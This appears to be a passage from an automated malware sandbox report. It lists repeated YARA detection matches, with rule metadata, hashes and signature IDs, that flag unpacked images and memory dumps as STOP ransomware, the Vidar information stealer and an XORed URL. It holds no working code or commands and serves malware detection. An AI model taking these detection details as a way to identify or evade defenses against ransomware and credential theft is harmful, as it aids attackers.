Source: 8.0.2OmglUwx83.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.2OmglUwx83.exe.22115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 14.2.2OmglUwx83.exe.22115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.2OmglUwx83.exe.22115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.355123959.0000000002290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000D.00000000.409643469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000002.427528493.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
